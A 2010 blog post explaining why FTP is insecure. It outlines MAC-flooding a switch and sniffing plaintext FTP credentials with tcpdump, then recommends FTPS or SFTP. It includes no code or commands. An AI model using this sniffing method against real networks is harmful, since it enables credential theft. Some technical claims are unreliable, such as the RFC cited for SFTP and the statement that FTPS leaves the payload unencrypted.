May 28, 2010

Using Insecure Protocols – FTP

Considering how security has evolved, it’s surprising that many companies still depend on old technologies and protocols. FTP is one such protocol. FTP is considered by most to be secure. While it can keep users out of areas they don’t belong, and logging activities increases detection for malicious commands, the protocol remains fairly insecure.

Sniffing for credentials

The easiest method to gain unwanted access to an FTP server is sniffing. There are several ways to do this. One ways is done by filling the switches MAC address table. The switch will no longer know which ports to forward the packets, and instead send the packet out every interface. It’s also important to note that not all switches are vulnerable to this form of attack. In this case, the MAC table for the unmanaged switch has been filled. With only 8Kb available for MAC addresses it did not take long to fill it. This was done by writing a Python script that sent packets from random imaginary sources to random imaginary destinations. The switch records the source MAC address and the interface it came from, taking a slot.To login to an FTP site, a server address, username, and password are needed. The FTP protocol uses USER and PASS to send credentials to the server, and a simple search is all that is needed to capture the information. The packet capture tool that used was tcpdump, which can be installed on many platforms including a Wi-Fi equipped cell phone.Here is the packet capture between two computers showing the user’s username and password.The password is there in plain text. With a simple Python script (to flood the switch), tcpdump, and a text editor, a user’s FTP login credentials have been captured. It’s not all bad news. There are several alternatives to FTP such as SFTP and FTPS.

SFTP vs. FTPS

FTPS

FTPS or FTP SSL is FTP with the control layer encrypted. This will mask a user’s credentials with X.509 certificates, however, not the payload. FTPS uses two channels, just as FTP. The secondary channel may make FTPS more difficult to run through a firewall compared to SFTP. One of the major drawbacks to FTPS is that there are few free, or open source servers, which use this protocol.

SFTP

SFTP is a binary protocol, the latest version of which is standardized in RFC 4253. All requests are packed to binary messages and sent to the server. In later versions, SFTP was extended to provide not just file upload/download operations, but also some file-system operations such as file lock, symbolic link and creation.

The Answer

The answer to this depends on what the goals and requirements are. SFTP or FTPS when used properly can help you to achieve PCI DSS compliance. For FTPS there are many commercial solutions such as JSCAPE Secure FTP Server. In addition, SFTP comes pre-installed on many Linux distributions though the OpenSSH package.